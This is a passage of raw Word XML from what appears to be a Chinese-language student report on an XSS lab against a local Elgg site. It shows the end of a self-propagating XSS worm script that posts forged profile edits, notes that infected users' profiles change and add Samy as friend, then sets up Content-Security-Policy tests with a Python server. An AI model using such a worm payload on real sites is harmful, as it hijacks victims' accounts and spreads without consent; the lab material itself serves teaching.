      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>47;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6687873D" w14:textId="77777777" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>if(elgg.session.user.guid != samyGuid)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C1ECD" w14:textId="77777777" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0116910B" w14:textId="77777777" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>var Ajax = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C6FC21" w14:textId="77777777" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax = new XMLHttpRequest();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C3737A" w14:textId="77777777" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.open("POST",sendurl,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0231ED6F" w14:textId="77777777" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:pPr>
        <w:ind w:firstLineChars="600" w:firstLine="1260"/>
      </w:pPr>
      <w:r w:rsidRPr="006E33E3">
        <w:t>Ajax.setRequestHeader("Host","www.xsslabelgg.com");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506E7432" w14:textId="068C6CBC" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C76D6" w14:textId="77777777" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Ajax.send(content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3417C3F6" w14:textId="4A7B9E3D" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC59481" w14:textId="7FE8113B" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDECE10" w14:textId="4DC9802F" w:rsidR="004B3BAF" w:rsidRDefault="004B3BAF" w:rsidP="004B3BAF">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA04DFE" w14:textId="76AD4BA1" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="004B3BAF"/>
    <w:p w14:paraId="03F87F12" w14:textId="4C1EA4EA" w:rsidR="006001F9" w:rsidRDefault="002C1304" w:rsidP="006001F9"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59551B6D" wp14:editId="561B2C06">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-99060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>259080</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1889760"/>
            <wp:effectExtent l="0" t="0" r="254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52" b="19679"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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B3BAF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登录samy账号将代码保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>About</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>me中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A466E6" w14:textId="1BBAD7BF" w:rsidR="002C1304" w:rsidRDefault="002C1304" w:rsidP="006001F9"/>
    <w:p w14:paraId="0B8608B3" w14:textId="3F322C86" w:rsidR="006001F9" w:rsidRDefault="002C1304" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="196FFBBA" wp14:editId="16ACC6F6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-274320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>243840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1120140"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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99" b="24687"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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登录admin账号，点击查看samy的个人资料，然后返回查看自己的资料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CE8227" w14:textId="6438D41F" w:rsidR="006001F9" w:rsidRDefault="002C1304" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19484AF8" wp14:editId="1B573037">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-350520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1417320</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="777240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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83" b="32970"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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可以看到个人资料已被修改，同时添加了Samy为好友</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF157D" w14:textId="563A37B4" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="147C4F59" w14:textId="0D784818" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="1EB8D94E" w14:textId="59AC60C4" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="104AD2A7" w14:textId="5790EF03" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="46401BB8" w14:textId="08346FB0" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="18F787B3" w14:textId="26761B44" w:rsidR="006001F9" w:rsidRDefault="002C1304" w:rsidP="006001F9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179B7A6" wp14:editId="1C00B91A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274310" cy="640080"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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39" b="40481"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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登录Alice的账号，查看admin的个人资料，然后返回查看自己的个人资料</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694F88EE" w14:textId="09A4350F" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="0F328BC0" w14:textId="48395079" w:rsidR="006001F9" w:rsidRDefault="002C1304" w:rsidP="006001F9"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20809287" wp14:editId="27134CA5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-243840</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>243840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="746760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91" b="33932"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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其个人资料被修改，同时添加了samy为好友</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714B4188" w14:textId="21F37DE9" w:rsidR="002C1304" w:rsidRDefault="002C1304" w:rsidP="006001F9"/>
    <w:p w14:paraId="1605D3C3" w14:textId="6F3CBCC7" w:rsidR="006001F9" w:rsidRDefault="002C1304" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明攻击成功实现自我传播</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C94FAF" w14:textId="3E2E0EC1" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="20AB3764" w14:textId="30CD91E8" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="2AB88A6B" w14:textId="7B35CE3F" w:rsidR="006001F9" w:rsidRPr="006C7DA1" w:rsidRDefault="006C7DA1" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7DA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Task 7: Defeating XSS Attacks Using CSP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2CA07A" w14:textId="74B18BDA" w:rsidR="006001F9" w:rsidRDefault="0061664B" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="02FBBEA0" wp14:editId="20E3046F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-152400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>220980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="254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87"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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首先下载并且解压缩csp</w:t>
      </w:r>
      <w:r>
        <w:t>.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A62CA" w14:textId="25F5CD93" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="77D07239" w14:textId="5A4F1AE3" w:rsidR="006001F9" w:rsidRDefault="00CA1B7C" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2F9B398A" wp14:editId="54DBD045">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>-274320</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>228600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5274310" cy="563880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="76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746"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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A1E10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入csp文件夹，运行</w:t>
      </w:r>
      <w:r w:rsidR="00CA1E10" w:rsidRPr="00CA1E10">
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidR="00CA1E10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00CA1E10" w:rsidRPr="00CA1E10">
        <w:t>server.py</w:t>
      </w:r>
      <w:r w:rsidR="00CA1E10">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25748598" w14:textId="77777777" w:rsidR="00CA1B7C" w:rsidRDefault="00CA1B7C" w:rsidP="00CA1E10"/>
    <w:p w14:paraId="0AB5BFE7" w14:textId="00ADC2F7" w:rsidR="00CA1E10" w:rsidRDefault="00CA1E10" w:rsidP="00CA1E10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改hosts文件，添加</w:t>
      </w:r>
      <w:r w:rsidR="00CA1B7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下内容并保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA921CE" w14:textId="19C7EE27" w:rsidR="00CA1E10" w:rsidRDefault="00CA1E10" w:rsidP="00CA1E10">
      <w:r>
        <w:t>127.0.0.1 www.example32.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B476507" w14:textId="51EBF1E0" w:rsidR="00CA1B7C" w:rsidRDefault="00CA1E10" w:rsidP="00CA1E10">
      <w:r>
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
      <w:r w:rsidR="00CA1B7C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r w:rsidR="00CA1B7C">
        <w:t>.example68.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C2A551" w14:textId="251D1CFB" w:rsidR="006001F9" w:rsidRDefault="00CA1E10" w:rsidP="00CA1E10">
      <w:r>
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>www</w:t>
      </w:r>
      <w:r>
        <w:t>.example79.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B52BDFC" w14:textId="0DA510FC" w:rsidR="00CA1E10" w:rsidRPr="00CA1B7C" w:rsidRDefault="00CA1E10" w:rsidP="00CA1E10"/>
    <w:p w14:paraId="4BDAF3E0" w14:textId="39619EB6" w:rsidR="00CA1B7C" w:rsidRDefault="00504164" w:rsidP="00CA1E10">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页各区域结果默认为Failed</w:t>
      </w:r>
      <w:r w:rsidR="00585B0D">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00585B0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当对应的js程序执行成功时，显示为O</w:t>
      </w:r>
      <w:r w:rsidR="00585B0D">
        <w:t>K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC1FE0C" w14:textId="3F232357" w:rsidR="00CA1B7C" w:rsidRDefault="00CA1B7C" w:rsidP="00CA1E10">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA801C3" w14:textId="205887E1" w:rsidR="00CA1E10" w:rsidRDefault="00CA1E10" w:rsidP="00CA1E10"/>
    <w:p w14:paraId="199BAE22" w14:textId="0CFA8690" w:rsidR="00CA1E10" w:rsidRDefault="00CA1E10" w:rsidP="00CA1E10"/>
    <w:p w14:paraId="717F934C" w14:textId="3F8579A6" w:rsidR="00CA1E10" w:rsidRDefault="00CA1E10" w:rsidP="00CA1E10"/>
    <w:p w14:paraId="097FD55A" w14:textId="10B3F77D" w:rsidR="00CA1E10" w:rsidRPr="00CA1E10" w:rsidRDefault="00CA1E10" w:rsidP="00CA1E10"/>
    <w:p w14:paraId="73E66D2E" w14:textId="3E754BD1" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="54A3C2D4" w14:textId="434519E1" w:rsidR="006001F9" w:rsidRPr="00CA1E10" w:rsidRDefault="00357EF7" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>在终端运行http</w:t>
      </w:r>
      <w:r>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:t>.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的情况下，首先访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00357EF7">
        <w:t>http://www.example32.com:8000/csptest.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E36CE0" w14:textId="36D4A9B0" w:rsidR="006001F9" w:rsidRDefault="006001F9" w:rsidP="006001F9"/>
    <w:p w14:paraId="177E9663" w14:textId="4B61F5C8" w:rsidR="006001F9" w:rsidRDefault="00357EF7" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2B5C2B7C" wp14:editId="7F6D04E6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274310" cy="2705100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9" b="21412"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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显示如下：1，4，5区域js程序成功执行</w:t>
      </w:r>
      <w:r w:rsidR="00504164">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，显示O</w:t>
      </w:r>
      <w:r w:rsidR="00504164">
        <w:t>K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4125C978" w14:textId="38811ED6" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其次访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00357EF7">
        <w:t>http://www.example68.com:8000/csptest.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB307EB" w14:textId="61C56B8A" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="471EC6BC" wp14:editId="5C07940D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5274310" cy="2682240"/>
            <wp:effectExtent l="0" t="0" r="2540" b="381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1" b="21798"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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显示如下：1，4，5区域的js程序成功执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC47836" w14:textId="63A8F2F6" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="208EE1E9" w14:textId="1D0D46E8" w:rsidR="00357EF7" w:rsidRDefault="00512696" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00512696">
        <w:t>http://www.example79.com:8000/csptest.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3956416D" w14:textId="07516C1F" w:rsidR="00512696" w:rsidRDefault="00512696" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果显示如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1F7D42" w14:textId="483D99E4" w:rsidR="00512696" w:rsidRPr="00512696" w:rsidRDefault="00512696" w:rsidP="006001F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1，4，5，6区域js区域成功执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A69FF" w14:textId="7495078F" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="52C0E714" w14:textId="4D6DC394" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="06F4F264" w14:textId="7E038FD6" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="69B1F6B5" w14:textId="6B52623B" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="528F6187" w14:textId="619D47B1" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="69D42E5C" w14:textId="0C037031" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="7AF3C96F" w14:textId="7583AC05" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="576B3007" w14:textId="79C65038" w:rsidR="00357EF7" w:rsidRDefault="00512696" w:rsidP="006001F9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8CF0707" wp14:editId="429C88A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727960"/>
            <wp:effectExtent l="0" t="0" r="254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1" b="21412"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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095745" w14:textId="2F429019" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="006001F9"/>
    <w:p w14:paraId="279ED6DD" w14:textId="13A5B694" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="006001F9"/>
    <w:p w14:paraId="5759FA85" w14:textId="245C3453" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将python代码修改成如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC4B660" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189578C3" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164"/>
    <w:p w14:paraId="39469C4B" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t>from http.server import HTTPServer, BaseHTTPRequestHandler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E6BFB6" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t>from urllib.parse import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03559A7D" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164"/>
    <w:p w14:paraId="06145A12" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t>class MyHTTPRequestHandler(BaseHTTPRequestHandler):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D021E8" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">  def do_GET(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1920E" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">    o = urlparse(self.path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333CF595" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">    f = open("." + o.path, 'rb') </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A62E72" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">    self.send_response(200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365092AC" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">    self.send_header('Content-Security-Policy', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C17A05C" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">          "default-src 'self';"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416FB506" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">          "script-src 'self' *.example68.com:8000 'self' *.example79.com:8000 'nonce-1rA2345' 'nonce-2rB3333' ")     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75808B95" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">    self.send_header('Content-type', 'text/html')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F77BC40" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">    self.end_headers()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7DDD76" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">    self.wfile.write(f.read())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA5B528" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t xml:space="preserve">    f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223AFB2" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164"/>
    <w:p w14:paraId="5E183CA5" w14:textId="77777777" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:r>
        <w:t>httpd = HTTPServer(('127.0.0.1', 8000), MyHTTPRequestHandler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00501844" w14:textId="62DB5EE1" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="00504164">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>httpd.serve_forever()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C171F00" w14:textId="7E0D3124" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="5B2332BB" w14:textId="705E0520" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="61F78A9E" w14:textId="708DC21C" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="095CAFE6" w14:textId="43D4CA9E" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="556DF4DA" w14:textId="765726C9" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="0877D3D3" w14:textId="78060138" w:rsidR="00357EF7" w:rsidRDefault="00357EF7" w:rsidP="006001F9"/>
    <w:p w14:paraId="1969AAB2" w14:textId="2BF9E89B" w:rsidR="00357EF7" w:rsidRDefault="00504164" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/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920B205" wp14:editId="2D5D4885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5274310" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="254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591"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto"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在终端运行python程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F763C8B" w14:textId="7B2AAE9B" w:rsidR="00504164" w:rsidRDefault="00504164" w:rsidP="006001F9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在浏览器中打开一中三个网页的任意一个，此处以</w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:history="1">
        <w:r w:rsidRPr="005C02A7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>http://www.example32.com:8000/csptest.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
